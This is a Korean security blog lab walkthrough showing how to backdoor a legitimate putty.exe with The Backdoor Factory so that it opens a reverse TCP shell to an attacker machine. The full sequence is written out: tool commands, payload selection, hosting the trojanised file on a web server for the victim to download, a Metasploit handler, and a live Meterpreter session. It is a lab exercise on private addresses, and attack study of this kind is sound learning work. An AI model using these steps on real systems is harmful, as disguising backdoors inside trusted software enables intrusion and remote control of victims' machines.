- 사용시스템
KaliLinux
window7
- 최신 버전의 Backdoor Factory를 받는다.
# git clone https://github.com/secretsquirrel/the-backdoor-factory.git
[참고] # apt-get -y install the-backdoor-factory
backdoor factory 를 Kali 내장 업데이트로 하면 잘 안됨 ( 버그 )
- 악성코드를 만들기 위해 정상 프로그램 다운로드
실습에서 사용할 프로그램은 putty.exe
www.putty.org 에서 받은 파일은 Cave 목록에 나오지 않기 때문에 예전버전을 다운받아서 사용합니다.
putty.exe드래그 앤 드롭을 하면 실습이 안되는 경우가 많기 때문에 다른 Kali의 공유폴더에 파일을 올려서 보냅니다.
[참고] Kali 공유 폴더 http://5log.tistory.com/119
# ls putty.exe
|
putty.exe |
|
# file putty.exe
|
putty.exe: PE32 executable (GUI) Intel 80386, for MS Windows |
|
> PE32의 윈도우 실행 파일임을 알 수 있다.
# git clone https://github.com/secretsquirrel/the-backdoor-factory.git
|
-.(`-') (`-') _ <-.(`-') _(`-') (`-') __( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO ) '-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,) | .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. ' | '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' | | /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .' | '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \ `------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--' (`-') _ (`-') (`-') <-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .-> (`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-. (OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' / / | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ / \_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /) `| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /` `--' `--' `--' `-----' `--' `-----' `--' '--' `--' Author: Joshua Pitts Email: the.midnite.runr[-at ]gmail<d o-t>com Twitter: @midnite_runr IRC: freenode.net #BDFactory
Version: 3.4.2
Usage: backdoor.py [options] Options: -h, --help show this help message and exit -f FILE, --file=FILE File to backdoor -s SHELL, --shell=SHELL Payloads that are available for use. Use 'show' to see payloads. -H HOST, --hostip=HOST IP of the C2 for reverse connections. -P PORT, --port=PORT The port to either connect back to for reverse shells or to listen on for bind shells -J, --cave_jumping Select this options if you want to use code cave jumping to further hide your shellcode in the binary. -a, --add_new_section Mandating that a new section be added to the exe (better success) but less av avoidance -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE User supplied shellcode, make sure that it matches the architecture that you are targeting. -c, --cave The cave flag will find code caves that can be used for stashing shellcode. This will print to all the code caves of a specific size.The -l flag can be use with this setting. -l SHELL_LEN, --shell_length=SHELL_LEN For use with -c to help find code caves of different sizes -o OUTPUT, --output-file=OUTPUT The backdoor output file -n NSECTION, --section=NSECTION New section name must be less than seven characters -d DIR, --directory=DIR This is the location of the files that you want to backdoor. You can make a directory of file backdooring faster by forcing the attaching of a codecave to the exe by using the -a setting. -w, --change_access This flag changes the section that houses the codecave to RWE. Sometimes this is necessary. Enabled by default. If disabled, the backdoor may fail. -i, --injector This command turns the backdoor factory in a hunt and shellcode inject type of mechanism. Edit the target settings in the injector module. -u SUFFIX, --suffix=SUFFIX For use with injector, places a suffix on the original file for easy recovery -D, --delete_original For use with injector module. This command deletes the original file. Not for use in production systems. *Author not responsible for stupid uses.* -O DISK_OFFSET, --disk_offset=DISK_OFFSET Starting point on disk offset, in bytes. Some authors want to obfuscate their on disk offset to avoid reverse engineering, if you find one of those files use this flag, after you find the offset. -S, --support_check To determine if the file is supported by BDF prior to backdooring the file. For use by itself or with verbose. This check happens automatically if the backdooring is attempted. -M, --cave-miner Future use, to help determine smallest shellcode possible in a PE file -q, --no_banner Kills the banner. -v, --verbose For debug information output. -T IMAGE_TYPE, --image-type=IMAGE_TYPE ALL, x86, or x64 type binaries only. Default=ALL -Z, --zero_cert Allows for the overwriting of the pointer to the PE certificate table effectively removing the certificate from the binary for all intents and purposes. -R, --runas_admin EXPERIMENTAL Checks the PE binaries for 'requestedExecutionLevel level="highestAvailable"'. If this string is included in the binary, it must run as system/admin. If not in Support Check mode it will attmept to patch highestAvailable into the manifest if requestedExecutionLevel entry exists. -L, --patch_dll Use this setting if you DON'T want to patch DLLs. Patches by default. -F FAT_PRIORITY, --fat_priority=FAT_PRIORITY For MACH-O format. If fat file, focus on which arch to patch. Default is x64. To force x86 use -F x86, to force both archs use -F ALL. -B BEACON, --beacon=BEACON For payloads that have the ability to beacon out, set the time in secs -m PATCH_METHOD, --patch-method=PATCH_METHOD Patching methods for PE files, 'manual','automatic', replace and onionduke -b SUPPLIED_BINARY, --user_malware=SUPPLIED_BINARY For onionduke. Provide your desired binary. -X, --xp_mode Default: DO NOT support for XP legacy machines, use -X to support XP. By default the binary will crash on XP machines (e.g. sandboxes) -A, --idt_in_cave EXPERIMENTAL By default a new Import Directory Table is created in a new section, by calling this flag it will be put in a code cave. This can cause bianry failure is some cases. Test on target binaries first. -C, --code_sign For those with codesigning certs wishing to sign PE binaries only. Name your signing key and private key signingcert.cer and signingPrivateKey.pem repectively in the certs directory it's up to you to obtain signing certs. -p, --preprocess To execute preprocessing scripts in the preprocess directory |
|
# ./backdoor.py -f /test/putty.exe -s show
|
____ ____ ______ __ / __ )/ __ \/ ____/___ ______/ /_____ _______ __ / __ / / / / /_ / __ `/ ___/ __/ __ \/ ___/ / / / / /_/ / /_/ / __/ / /_/ / /__/ /_/ /_/ / / / /_/ / /_____/_____/_/ \__,_/\___/\__/\____/_/ \__, / /____/ Author: Joshua Pitts Email: the.midnite.runr[-at ]gmail<d o-t>com Twitter: @midnite_runr IRC: freenode.net #BDFactory
Version: 3.4.2
[*] In the backdoor module [*] Checking if binary is supported [*] Gathering file info [*] Reading win32 entry instructions The following WinIntelPE32s are available: (use -s) cave_miner_inline iat_reverse_tcp_inline iat_reverse_tcp_inline_threaded iat_reverse_tcp_stager_threaded iat_user_supplied_shellcode_threaded meterpreter_reverse_https_threaded reverse_shell_tcp_inline reverse_tcp_stager_threaded user_supplied_shellcode_threaded |
|
# ./backdoor.py -f /test/putty.exe -H 192.168.27.50 \
-P 8080 -s iat_reverse_tcp_stager_threaded
|
-.(`-') (`-') _ <-.(`-') _(`-') (`-') __( OO) (OO ).-/ _ __( OO)( (OO ).-> .-> .-> <-.(OO ) '-'---.\ / ,---. \-,-----.'-'. ,--.\ .'_ (`-')----. (`-')----. ,------,) | .-. (/ | \ /`.\ | .--./| .' /'`'-..__)( OO).-. '( OO).-. '| /`. ' | '-' `.) '-'|_.' | /_) (`-')| /)| | ' |( _) | | |( _) | | || |_.' | | /`'. |(| .-. | || |OO )| . ' | | / : \| |)| | \| |)| || . .' | '--' / | | | |(_' '--'\| |\ \| '-' / ' '-' ' ' '-' '| |\ \ `------' `--' `--' `-----'`--' '--'`------' `-----' `-----' `--' '--' (`-') _ (`-') (`-') <-. (OO ).-/ _ ( OO).-> .-> <-.(OO ) .-> (`-')-----./ ,---. \-,-----./ '._ (`-')----. ,------,) ,--.' ,-. (OO|(_\---'| \ /`.\ | .--./|'--...__)( OO).-. '| /`. '(`-')'.' / / | '--. '-'|_.' | /_) (`-')`--. .--'( _) | | || |_.' |(OO \ / \_) .--'(| .-. | || |OO ) | | \| |)| || . .' | / /) `| |_) | | | |(_' '--'\ | | ' '-' '| |\ \ `-/ /` `--' `--' `--' `-----' `--' `-----' `--' '--' `--' Author: Joshua Pitts Email: the.midnite.runr[-at ]gmail<d o-t>com Twitter: @midnite_runr IRC: freenode.net #BDFactory
Version: 3.4.2
[*] In the backdoor module [*] Checking if binary is supported [*] Gathering file info [*] Reading win32 entry instructions [*] Gathering file info [*] Overwriting certificate table pointer [*] Loading PE in pefile [*] Parsing data directories [*] Looking for and setting selected shellcode [*] Creating win32 resume execution stub [*] Looking for caves that will fit the minimum shellcode length of 409 [*] All caves lengths: 409 ############################################################ The following caves can be used to inject code and possibly continue execution. **Don't like what you see? Use jump, single, append, or ignore.** ############################################################ [*] Cave 1 length as int: 409 [*] Available caves: 1. Section Name: None; Section Begin: None End: None; Cave begin: 0x29c End: 0xffc; Cave Size: 3424 2. Section Name: .rdata; Section Begin: 0x5d000 End: 0x7b000; Cave begin: 0x7a47c End: 0x7b000; Cave Size: 2948 3. Section Name: .data; Section Begin: 0x7b000 End: 0x7d000; Cave begin: 0x7b9e5 End: 0x7bc0c; Cave Size: 551 4. Section Name: None; Section Begin: None End: None; Cave begin: 0x7c400 End: 0x7d00a; Cave Size: 3082 ************************************************** [!] Enter your selection: 2 [!] Using selection: 2 [*] Changing flags for section: .rdata [*] Patching initial entry instructions [*] Creating win32 resume execution stub [*] Looking for and setting selected shellcode File putty.exe is in the 'backdoored' directory |
|
> 1~4 번까지 모두 파일이 만들어져야 하지만 확인해본 결과 2, 3번만 되고 1, 4번은 되지 않는다. ( 에러 )
# cd backdoored
# ls
|
putty.exe |
|
# md5sum /test/putty.exe
|
ba78410702f0cc8453da1afbb2a8b670 /test/putty.exe |
|
# md5sum /test/the-backdoor-factory/backdoored/putty.exe
|
9cef6b24903632c3a9f2aba6af14a4db /test/the-backdoor-factory/backdoored/putty.exe |
|
> md5 값이 다르다.
# ls -l /test/putty.exe /test/the-backdoor-factory/backdoored/putty.exe
|
-rwxr--r-- 1 root root 531368 11월 11 20:44 /test/putty.exe -rwxr--r-- 1 root root 524288 11월 11 20:48 /test/the-backdoor-factory/backdoored/putty.exe |
|
> 이름은 같지만 다른 파일임을 알 수 있다.
# cp putty.exe /var/www/html
> 웹 페이지에 올려 win7 에서 다운로드 받게 한다.
# msfconsole -q
|
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.27.50 LHOST => 192.168.27.50 msf exploit(handler) > set LPORT 8080 LPORT => 8080 msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.27.50:8080 [*] Starting the payload handler... |
|
> Kali는 Listen 상태로 대기한다.
(win7)
http://192.168.27.50/putty.exe 로 접속하여 다운로드 받는다.
[참고] 안될시
(Kali)
# service apache2 restart
다운받은 putty를 실행시킨다.
> 실행이 잘 되는 것을 확인 할 수 있다.
> 192.168.27.50 으로 접속해보자
> 일반 putty 프로그램처럼 잘 작동하는 것을 알 수 있다.
[참고] Kali root 계정 로그인 안될시
# vi /etc/ssh/sshd_conf
/PermitRootLogin 를 찾아서 yes로 변경
(Kali)
|
[*] Sending stage (957487 bytes) to 192.168.27.202 [*] Meterpreter session 2 opened (192.168.27.50:8080 -> 192.168.27.202:49297) at 2017-11-11 21:09:57 +0900 meterpreter > sysinfo Computer : ADMINSTRATOR-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 System Language : ko_KR Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.27.202 - Meterpreter session 2 closed. Reason: User exit |
|
> 연결된것을 확인할 수 있다.
> 간단하게 sysinfo 명령어를 수행해보고 연결을 끊는다.
> Kali에서 연결을 종료하면 window7 에서도 putty가 꺼진다.
> 마찬가지로 window7에서 putty를 끄면 Kali에서도 연결이 끊긴다.
'Security > 정보 수집' 카테고리의 다른 글
| 변조된 PDF 파일 생성하기 (0) | 2017.11.11 |
|---|---|
| virustotal 사이트 사용하기 (0) | 2017.11.11 |
| 메타스플로잇을 이용하여 윈도우 2008 로그 삭제하기 (0) | 2017.11.10 |
| 메타스플로잇을 사용하여 윈도우즈 시스템 장악하기 (0) | 2017.11.10 |
| 메타스플로잇을 이용하여 톰캣(Tomcat) 취약점 공격 (0) | 2017.11.10 |
